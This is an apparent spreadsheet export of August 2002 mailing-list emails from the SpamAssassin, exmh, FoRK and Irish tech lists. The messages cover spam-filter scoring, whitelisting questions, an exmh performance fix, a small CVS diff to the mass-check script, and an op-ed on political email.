    <t>Like an alias for each list that points to the nonspamtrap address.\n\nJ\n\n\nAt 10:50 AM -0700 8/22/02, Craig R.Hughes wrote:\n&gt;Are you filtering the nonspamtrap for spam when those newsletters \n&gt;sold your address to someone you didn't sign up with?  You should \n&gt;probably manually verify that all the mail in the trap is in fact \n&gt;nonspam!\n&gt;\n&gt;C\n&gt;\n&gt;On Thursday, August 22, 2002, at 07:59  AM, Justin Mason wrote:\n&gt;\n&gt;&gt;\n&gt;&gt;Justin Shore said:\n&gt;&gt;\n&gt;&gt;&gt;I just ran across a false positive that scored 8.6.  The message was\n&gt;&gt;&gt;a solicited ad from Apple.com on educator deals.  I can send a copy\n&gt;&gt;&gt;if anyone wants it.\n&gt;&gt;\n&gt;&gt;Yes, please do send it on, and I'll add it to the non-spam corpus.\n&gt;&gt;\n&gt;&gt;To date, the scores evolved by SpamAssassin are very biased towards\n&gt;&gt;non-HTML, non-newsletter-ish mail.  This release should be different, as\n&gt;&gt;I've been spending the last month signing up a "nonspamtrap" to every\n&gt;&gt;legit newsletter I can find ;)\n&gt;&gt;\n&gt;&gt;This should mean that tests which match common-enough newsletter practices\n&gt;&gt;will no longer get such high scores once we re-run the GA.\n\n-- \n\n--\nJustin Shore, ES-SS ES-SSR                Pittsburg State University\nNetwork &amp; Systems Manager                 [URL]http://www.pittstate.edu[/URL]\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spamassassin-talk@example.sourceforge.net\nFrom: Ken Scott &lt;admin@shellworld.net&gt;\nDate: Thu, 22 Aug 2002 13:01:44 -0500 (CDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:01:44 -0500 (CDT)</t>
  </si>
  <si>
    <t>[SAtalk] Some Stupid Questions</t>
  </si>
  <si>
    <t>As the subject line indicates, I'm sure these are stupid questions, but\nI'm having trouble getting SA working like I understand it should work,\nand have about given up on trying to figure it out myself.\n\nIf a user has a line like:\n\nwhitelist_from *@yahoogroups.com\n\nin his .spamassassin/user_prefs file, does that line not, in effect,\ntell the program to take no action at all against any mail coming in from\nyahoogroups.com, or is there still checking being done against it?  And if\nthe latter, what does he need to place in user_prefs to cause such mail\nto be ignored?  I'm testing SA here with a few users who happen to be on\nyahoogroups lists, before deploying it system-wide, and although the above\nline has been added to their user_prefs files, much of their list mail is\nstill going to the spam folder due to all the usual things you would\nexpect to trigger SA.\n\nThanks in advance for any help.\n\n--\nKen Scott,\nadmin@shellworld.net\n\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Anders Eriksson &lt;aeriksson@fastmail.fm&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 12:49:41 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 12:49:41 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-451422450P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Thu, 22 Aug 2002 12:23:38 -0500 &gt; &gt; Okay....Catchup unseen is something that I don't use often, but i can  &gt; certainly reproduce this.  I'll dig into it.  It's probably simple. Try it now. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-451422450P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZSQ1K9b4h5R0IUIRAt6BAJ4lZwVy40vrhgO5SRoToDOjp7jkdwCfUSw7 vei8luehray6oqTftNPId8g= =6Ao0 -----END PGP SIGNATURE----- --==_Exmh_-451422450P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Steve Burt &lt;Steve_Burt@cursor-system.com&gt;\nDate: Thu, 22 Aug 2002 12:46:18 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 12:46:18 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] RE: Alexander</t>
  </si>
  <si>
    <t>Martin A posted:\nTassos Papadopoulos, the Greek sculptor behind the plan, judged that the\n limestone of Mount Kerdylio, 70 miles east of Salonika and not far from the\n Mount Athos monastic community, was ideal for the patriotic sculpture. \n \n As well as Alexander's granite features, 240 ft high and 170 ft wide, a\n museum, a restored amphitheatre and car park for admiring crowds are\nplanned\n---------------------\nSo is this mountain limestone or granite?\nIf it's limestone, it'll weather pretty fast.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Thu, 22 Aug 2002 12:39:47 -0300</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 12:39:47 -0300</t>
  </si>
  <si>
    <t>The case for spam</t>
  </si>
  <si>
    <t>SpamAssassin is hurting democracy!\nOwen\n---------------------------------------------------------------------------------------------------------------------\n\n[URL]http://www.bayarea.com[/URL]\n\nInternet can level the political playing field\nBy Mike McCurry and Larry Purpuro\n\nNOT many months from now, people across the country will experience one \nof the great recurring features of American democracy. At shopping \nmalls, on factory floors, at church socials and even on our front \nstoops, we will be approached by individuals who want to represent us in \npublic office. While chances are high that we won't know them \npersonally, they will walk up to us, offer a handshake and a flier and \nask for our votes.\n\nJust as technology is affecting every other area of communication, it \nhas begun to affect the way political candidates communicate with voters.\n\nIn this year's GOP gubernatorial primary, California Secretary of State \nBill Jones, who faced better-funded candidates, acquired the e-mail \naddresses of more than a million potential California voters and sent \neach an unsolicited e-mail asking for support.\n\nThat day, he might have chosen any of the more traditional -- and more \nexpensive -- methods of contacting voters, such as direct mail, radio \nspots or TV ads. But he spent only about 2 cents per message, instead of \n35 cents or more per message for direct mail or in another medium.\n\nHad Jones chosen direct mail, radio or TV, that communication would have \nbeen equally ``unsolicited,'' as defined in the e-mail world. Few voters \nwould have ``opted in'' to receive campaign information from Jones \nthrough any of those channels.\n\nThe response to Jones' e-mail effort, however, was swift and intense. He \nwas lambasted by anti-spam advocates, and media coverage was almost \nentirely negative. To be fair, some of Jones' tactics could have been \nrefined. He used a less-than-perfect list and no standard-practice \n``paid for'' disclaimer in the message.\n\nHis detractors, however, attacked him not for his tactical miscues but \nbecause the e-mail was sent unsolicited. In fact, Jones' online campaign \nmay have been his most visible asset. In an era of cynicism toward money \nin politics -- money typically spent on other unsolicited communication \nmediums -- Jones tried to level the playing field.\n\nNo one likes commercial spam. It is irrelevant and untargeted and can be \nhighly intrusive and even offensive. But as a sophisticated society, \nit's time to differentiate commercial spam from very different \nunsolicited e-mail sent by political candidates to voters.\n\nThe debate is particularly relevant in light of legislation in Congress \nthat would constitute the first federal law to directly address spam. We \nbelieve e-mail is no more intrusive than direct mail, telemarketing or \nTV advertising when it comes to politicians seeking to reach voters. A \nsimple link in good e-mail campaigns allows recipients to opt out of \nfuture mailings. Direct mail takes at least a phone call or stamp to be \ntaken off a list, and viewers must repeatedly endure TV ads.\n\nWhen a candidate lacks a large campaign war chest, he or she can use the \nInternet to provide constituents with information to better prepare them \nto perform their civic duty of casting educated votes. With more than 60 \npercent of all potential voters in this country possessing e-mail \naccounts, it makes sense that political candidates use this medium.\n\nCandidates might avoid some of the tactical problems encountered by the \nJones campaign if they use the technologies available today that better \nensure quality of e-mail lists and target content to specific recipient \ngroups.\n\nBut the broader point remains. When a political candidate sends a voter \nan e-mail, that recipient can choose to delete the message without \nopening it, unsubscribe from the list, read it or even reply and engage \nthe sender. That choice should belong to the voter -- not to anti-spam \nadvocates whose efforts are better focused on commercial e-mail. \nPolitical candidates should be free to communicate with voters as best \nthey can, and let voters decide what to do with that information.\n\n\n--------------------------------------------------------------------------------\nMike McCurry, former press secretary for President Clinton, is CEO of an \nadvocacy management and communications software company. Larry Purpuro, \nthe former Republican National Committee deputy chief of staff, is \nfounder and president of a political e-marketing firm. This was written \nfor the Los Angeles Times. \n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.bayarea.com http://xent.com</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;,\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Thu, 22 Aug 2002 12:35:46 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 12:35:46 -0500</t>
  </si>
  <si>
    <t>Re: [SAtalk] 2800 sightings this month</t>
  </si>
  <si>
    <t>At 1:16 PM -0400 8/22/02, Theo Van Dinter wrote:\n&gt;On Thu, Aug 22, 2002 at 07:05:33PM +0200, Malte S. Stretz wrote:\n&gt;&gt;  Ummm... has somebody noticed that spamassassin-sightings is the fourth most\n&gt;&gt;  active list for this month on [1]? There is more sighting than talk and\n&gt;&gt;  devel together ;-)\n&gt;\n&gt;hmmm.  do people know that they should only send false negatives there?\n&gt;either there's a lot of stuff SA is missing, or some people are just\n&gt;sending all their spam there.\n\nI've sent in some spam that either didn't score or scored practically \nnothing, like below 5.  I figure that most people run at 5 so if it \nscores less than that, a rule needs to be honed to catch it.\n\nJustin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR                Pittsburg State University\nNetwork &amp; Systems Manager                 [URL]http://www.pittstate.edu[/URL]\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Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 12:23:38 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 12:23:38 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-518574644P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Thu, 22 Aug 2002 18:55:03 +0200 &gt; &gt;  &gt;  &gt;  &gt; &gt; &gt; &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow o &gt; n  &gt; &gt; &gt; &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this proble &gt; m? &gt; &gt; &gt; &gt;  &gt; &gt; &gt; &gt; I'll take the blame. &gt; &gt; &gt; &gt;  &gt; &gt; &gt; &gt; The reason, I suspect, is that we're needlessly reading the .sequence &gt; s file  &gt; &gt; &gt; &gt; multiple times because of other sequences.  I need to make the code m &gt; uch  &gt; &gt; &gt; &gt; smarter about handling that file, but first I have a few other fish t &gt; o fry in  &gt; &gt; &gt; &gt; my rather large patch that's on it's way. &gt; &gt; &gt; &gt;  &gt; &gt; &gt;  &gt; &gt; &gt; No panic, &gt; &gt; &gt;  &gt; &gt; &gt; I'm all for cleaning things up before getting it optimized. &gt; &gt;  &gt; &gt; Okay, this fix is now checked in. &gt; &gt;  &gt; I'm afraid it didn't help. It still seems to be slower than ~1 month  &gt; ago. Maybe slightly faster than yeasterday. I'm (still) seeing an  &gt; "unseen countdown" in the log. Okay....Catchup unseen is something that I don't use often, but i can  certainly reproduce this.  I'll dig into it.  It's probably simple. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-518574644P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZR4aK9b4h5R0IUIRAub4AKCE9sxZQfiRl18xhrtT2WLrEqEucACeJGm0 YdhaA8YocKvlkyW4sTIZ3lU= =XhOQ -----END PGP SIGNATURE----- --==_Exmh_-518574644P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Haun &lt;chris@noskillz.com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Thu, 22 Aug 2002 12:16:04 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 12:16:04 -0700</t>
  </si>
  <si>
    <t>Chris Haun wrote:\n&gt; A LifeGem is a certified, high quality diamond created from the carbon of \n&gt; your loved one as a memorial to their unique and wonderful life.\n\nWhy wait until you're dead? I'm sure there's enough carbon in\nthe fat from your typical liposuction job to make a decent diamond.\n\n- Joe\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "J. W. Ballantine" &lt;jwb@homer.att.com&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 11:28:39 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 11:28:39 -0500</t>
  </si>
  <si>
    <t>"J. W. Ballantine" &lt;jwb@homer.att.com&gt;, exmh-workers@spamassassin.taint.org</t>
  </si>
  <si>
    <t>--==_Exmh_-763629846P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Thu, 22 Aug 2002 09:12:16 -0500 &gt; &gt; &gt; From:  "J. W. Ballantine"  &gt; &gt; Date:  Wed, 21 Aug 2002 09:51:31 -0400 &gt; &gt; &gt; &gt; I CVS'ed the unseen/Sequences changes and installed them, and have only one  &gt; &gt; real issue. &gt; &gt;  &gt; &gt; I use the unseen window rather than the exmh icon, and with the new code &gt; &gt; I can't seem to be able to.  How many unseen when when I have the main window open &gt; &gt; is not really necessary. &gt;  &gt; hmmm, I stole the code from unseenwin, but I never tested it since I don't use  &gt; that functionality.  Consider it on my list of things to check. Well, unfortunately, I appear to be using a window manager that doesn't  support the icon window. However, I did fix some bugs in the related "Hide When Empty" functionality  which may solve the issue.  You may need to remove "unseen" from the "always  show sequences" to make this work.  If so, let me know so I can put that in  the help window for "Icon Window" as it already is for "Hide When Empty". Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-763629846P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZRE3K9b4h5R0IUIRAjS+AJ4m8f6zA6kMkzYOCI7d+HelmpapYQCfbbDi LCumaahI4ILE6tbF8nUd0r8= =nwh1 -----END PGP SIGNATURE----- --==_Exmh_-763629846P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "Tony L. Svanstrom" &lt;tony@svanstrom.com&gt;\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Thu, 22 Aug 2002 11:22:43 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 11:22:43 -0700</t>
  </si>
  <si>
    <t>Re: [SAtalk] Re: SA In The News</t>
  </si>
  <si>
    <t>So do you know my public key?  Does the guy who wants to buy \n10,000 licenses of SpamAssassin Pro?  Do I really want to lose \nemail from either of you?\n\nC\n\nOn Thursday, August 22, 2002, at 10:13  AM, Tony L. Svanstrom wrote:\n\n&gt; On Thu, 22 Aug 2002 the voices made Craig R.Hughes write:\n&gt;\n&gt;&gt; Trouble is, you don't necessarily know ahead of time who's \n&gt;&gt; wanting to send\n&gt;&gt; you stuff.  I don't have your PGP public key on my keychain.  \n&gt;&gt; You can do all\n&gt;&gt; the signing you want, it's not going to help.  However, if you \n&gt;&gt; stick a Habeas\n&gt;&gt; header in your mail, I can (hopefully) be reasonably sure that \n&gt;&gt; you're not\n&gt;&gt; trying to spam me.  It is going to be all about enforcement \n&gt;&gt; though; we'll\n&gt;&gt; have to see how they do on enforcement.\n&gt;\n&gt;  Signing messages to someone ('s public key) isn't impossible, \n&gt; using some\n&gt; creative scripting you could even do it with OpenPGP-compatible \n&gt; software...\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yyyy@spamassassin.taint.org (Justin Mason)\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Thu, 22 Aug 2002 11:19:57 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 11:19:57 -0700</t>
  </si>
  <si>
    <t>[SAtalk] Re: [SAdev] 2.40 RELEASE PROCESS: mass-check status, folks?</t>
  </si>
  <si>
    <t>I think with the confusion and all, we should give these folks \nuntil the end of the day to get fixed logs uploaded :)\n\nJustin, on a related note -- I didn't include the spamtrap stuff \nfrom the corpus directory on your server in my logs, but that \nshould definitely be in there -- don't know if you'd included it \nin yours or not.  I think it's from Kelsey's mailtraps...\n\nC\n\nOn Thursday, August 22, 2002, at 09:49  AM, Justin Mason wrote:\n\n&gt; Files that are out of date (as far as I can tell -- they have no date\n&gt; comment), and will be ignored:\n&gt;\n&gt;         nonspam-danielp.log\n&gt;         nonspam-danielr.log\n&gt;         nonspam-duncan.log\n&gt;         nonspam-james.log\n&gt;         nonspam-laager.log\n&gt;         nonspam-messagelabs.log\n&gt;         nonspam-msquadrat.log\n&gt;         nonspam-olivier.log\n&gt;         nonspam-oliviern.log\n&gt;         nonspam-quinlan.log\n&gt;         nonspam-rodbegbie.log\n&gt;         nonspam-sean.log\n&gt;         nonspam-theo.log\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yyyy@spamassassin.taint.org (Justin Mason)\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Thu, 22 Aug 2002 11:17:14 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 11:17:14 -0700</t>
  </si>
  <si>
    <t>Re: [SAtalk] German spam corpus / foreign language spam</t>
  </si>
  <si>
    <t>On Thursday, August 22, 2002, at 09:36  AM, Justin Mason wrote:\n\n&gt;\n&gt; "Craig R.Hughes" said:\n&gt;\n&gt;&gt; I thought we'd sort of decided that after 2.40 we'd switch the\n&gt;&gt; meaning of the "lang" prefix to actually mean "run these rules\n&gt;&gt; if language matches", where "language" is what TextCat spits out\n&gt;&gt; for a message, as opposed to using the locale which is how\n&gt;&gt; things currently work.\n&gt;\n&gt; ah, right -- I'd forgotten that.  :(\n&gt;\n&gt; doesn't help with the finding-broken-rules QA case though...\n\nIt does, if you have a corpus of german spam and nonspam to feed \nit, and you're not in a de locale.\n\nC\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spamassassin-commits@example.sourceforge.net\nFrom: Craig Hughes &lt;hughescr@users.sourceforge.net&gt;\nDate: Thu, 22 Aug 2002 11:13:32 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 11:13:32 -0700</t>
  </si>
  <si>
    <t>Craig Hughes &lt;hughescr@users.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/masses mass-check,1.67,1.67.2.1</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/masses\nIn directory usw-pr-cvs1:/tmp/cvs-serv440/masses\n\nModified Files:\n      Tag: b2_4_0\n	mass-check \nLog Message:\nFixes, additions to mass-check\n\nIndex: mass-check\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/masses/mass-check,v\nretrieving revision 1.67\nretrieving revision 1.67.2.1\ndiff -b -w -u -d -r1.67 -r1.67.2.1\n--- mass-check	20 Aug 2002 12:29:32 -0000	1.67\n+++ mass-check	22 Aug 2002 18:13:30 -0000	1.67.2.1\n@@ -96,6 +96,7 @@\n \n print "# mass-check results from $who\@$where, on $when\n";\n print "# M:SA version ".$spamtest-&gt;Version()."\n";\n+print '# CVS tag: $Name$',"\n";\n $iter-&gt;set_function (\&amp;wanted);\n $iter-&gt;run (@ARGV);\n exit;\n@@ -132,6 +133,8 @@\n   my $tests = $status-&gt;get_names_of_tests_hit();\n \n   $tests = join(',', sort(split(/,/, $tests)));\n+\n+  $id =~ s/\s/_/g;\n \n   printf "%s %2d %s %s\n",\n 		    ($yorn ? 'Y' : '.'),\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Thu, 22 Aug 2002 11:11:57 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 11:11:57 -0700</t>
  </si>
  <si>
    <t>&gt;                                 You have multiple generations of\n&gt; peasants/squatters that cultivate and live on the lands almost as a\n&gt; human parts of the property package.\n\nWhen I'd read that "getting legal title\ncan take 20 years", when I believe that\n1 year ought to be more than sufficient,\n(and helped by the Cairo reference) I'd\nassumed that we were talking about the\nurban poor.\n\nIf I see people living in mansions, or\neven in suburban subdivisions, I assume\nthey didn't have too much trouble with\ntheir titles.\n\nIf I see people living in shanties and\nhaphazard alleyways, I tend to assume\ntheir parcels weren't exactly recorded\non the government maps, or paid for with\na bank loan, especially when nearby vacant\nlots have shotgun wielding men presumably\nintent on keeping them "development" free.\n\nNow, it may be that "Manhattanites' view\nof America" to say that outside of Metro\nManila, Davao, and maybe another city or\ntwo (Cebu?), everything else (literally)\nis the boondocks.  But going on that very\nbroad assumption, I guess I'm describing\nthe flip side of Mr. Roger's experience:\nthe paisanos (who leave behind those who\nremain on a patron's rural land) move to\nManila, and (the second assumption) squat\nin shantytowns there, at least until they\ncan line up a middle-class job.\n\nSo, going on two large assumptions, I can\ncome up with a scenario under which title\nwould take 20 years: a shantytown arises\nsomewhere in the midst of a section (or\nwhatever the Spanish used to divvy up the\nland) and it takes decades of arguing to\nput together a package which somehow can\nboth compensate the owner and record lots\nfor the inhabitants.  Just transferring\ntitle to an existing lot, between parties\nwho have money, ought not to be a problem.\n\nThe obvious solution, at least to us\nbarking farting chihuahuas on FoRK, is\nto "introduce market mechanisms".  It is\nleft as an exercise to come up with one\nwhich works when many of the agents (are\nperceived to) have negligible NPV.\n\n-Dave\n\n&gt;              [land reform] meant that all the agricultural producers had\n&gt; to plant crops all the time (profitable or not) ...\n\nWhat happened to more highly-capitalized\nland?  Putting in trees instead of crops\nsounds like it might sidestep that.\n\n&gt; Mr. Long, I think you'd particularly enjoy the De Soto work.\n\nOn the "to find" list.  Any chance of\nan explanation of that "Bell Jar" in\nthe meantime?\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;webdev@linux.ie&gt;\nFrom: "adam" &lt;lists@spamfilter.cc&gt;\nDate: Thu, 22 Aug 2002 10:38:40 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:38:40 +0100</t>
  </si>
  <si>
    <t>"adam" &lt;lists@spamfilter.cc&gt;</t>
  </si>
  <si>
    <t>&lt;webdev@linux.ie&gt;</t>
  </si>
  <si>
    <t>RE: [Webdev] PHP/MySQL Virtual Hosting Recommendations?</t>
  </si>
  <si>
    <t>Hi Lee,\n\n+ You could try iewebs.com aswell, though I don't know if they do\n+ "just hosting".\n+\nHeh, you won't find much on iewebs.com these days. Apache test page.\n\nFor future reference, ieWebs is /kind of/ defunct -- I won't be able to do\nprivate devel projects for a while, so I'm not actively pushing it. I still\ndo hosting and domreg, but I only do vanilla accounts unless I know the user\nreasonably well. I have trust issues.\n\nThanks for the plug though. Just like me to no longer have a website when it\nhappens. :)\n\nadam\n\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>To: Open Tech list &lt;open@webnet.ie&gt;, iiu &lt;iiu@taint.org&gt;\nFrom: Bernard Michael Tyers &lt;bernard.tyers@dcu.ie&gt;\nDate: Thu, 22 Aug 2002 10:35:46 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:35:46 +0100</t>
  </si>
  <si>
    <t>Open Tech list &lt;open@webnet.ie&gt;, iiu &lt;iiu@taint.org&gt;</t>
  </si>
  <si>
    <t>[IIU] Printer cartiridges looking for a good home.</t>
  </si>
  <si>
    <t>howdy all,\n\nI have in my possession the following:\n\n2/3     Apple toner cartridges    M20 45G/A for laser writer 300 / 320 /\nand 4/600 PS\n1     Apple toner cartridge     M2473G/A  for laser writer 16/600PS /\npro 630 / pro 600\n1     Cannon EP-A cartridge\n1     Cannon EP-E cartridge\n\n(the numbers might be a little less)\n\nDoes anyone have one of these printers? Does anyone want to give me the \nchange in their pockets, or the price of a pint for them?\nThey would make a great Christmas present!\n\nIf so you can call the printer cartridge hotline on the number below.\nIf lines are busy call later. But do call NOW!\n\nBernard "I should be a host on QVC" Tyers\n\n-- \nBernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *\nE: bernard.tyers@dcu.ie * W: [URL]www.physics.dcu.ie[/URL] * L:N117\n\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>To: "Karsten M. Self" &lt;karsten@freerun.com&gt;\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Thu, 22 Aug 2002 10:33:33 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:33:33 -0700</t>
  </si>
  <si>
    <t>"Karsten M. Self" &lt;karsten@freerun.com&gt;</t>
  </si>
  <si>
    <t>Interesting.  It's possible, of course, that the shitty economy \nis hurting the spammers as much as anyone else.  But if you've \nbeen aggressively reporting, then it could just be that.  Could \nbe your upstream ISP is being more aggressive too...\n\nC\n\nOn Wednesday, August 21, 2002, at 05:02  PM, Karsten M. Self wrote:\n\n&gt; ...what these plots *don't* show is the drop from ~55 \n&gt; mails/daily to ~30\n&gt; daily that I've seen at work, since 1st week of May, when spam receipts\n&gt; peaked.  Not sure if it's aggressive reporting that's getting us off\n&gt; lists, or if other people are seeing similar.\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Robert Elz &lt;kre@munnari.OZ.AU&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 10:25:52 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:25:52 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-1317289252P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 21 Aug 2002 10:40:39 -0500 &gt; &gt; &gt; From:  Chris Garrigues  &gt; &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500 &gt; &gt; &gt; &gt; Ouch...I'll get right on it. &gt; &gt;  &gt; &gt; &gt; From:  Robert Elz  &gt; &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700 &gt; &gt; &gt; &gt; &gt; &gt; Any chance of having that lengthen instead?   I like all my exmh stuff &gt; &gt; &gt; in nice columns (fits the display better).   That is, I use the detache &gt; d &gt; &gt; &gt; folder list, one column.   The main exmh window takes up full screen, &gt; &gt; &gt; top to bottom, but less than half the width, etc... &gt;  &gt; I thought about that.  The first order approximation would be to just add  &gt; using pack .... -side top instead of pack ... -side left, however, since their  &gt; each a different width, it would look funny. I've done this.  It's not as pretty as I think it should be, but it works.   I'm going to leave the cosmetic issues to others.  When I update the  documentation, I'll add this to the exmh.TODO file. I'm leaving for a 2 1/2 week vacation in a week, so this is the last new  functionality I'm going to add for a while.  Also, I now have pretty much  everything in there that I want for my own use, so I'm probably pretty much  done.  I'll work on bug fixes and documentation before my vacation, and  hopefully do nothing more afterwards. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-1317289252P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZQJ/K9b4h5R0IUIRAiPuAJwL4mUus5whLNQZC8MsDlGpEdKNrACcDfZH PcGgN9frLIM+C5Z3vagi2wE= =qJoJ -----END PGP SIGNATURE----- --==_Exmh_-1317289252P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org (Justin Mason)\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Thu, 22 Aug 2002 10:20:06 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:20:06 -0500</t>
  </si>
  <si>
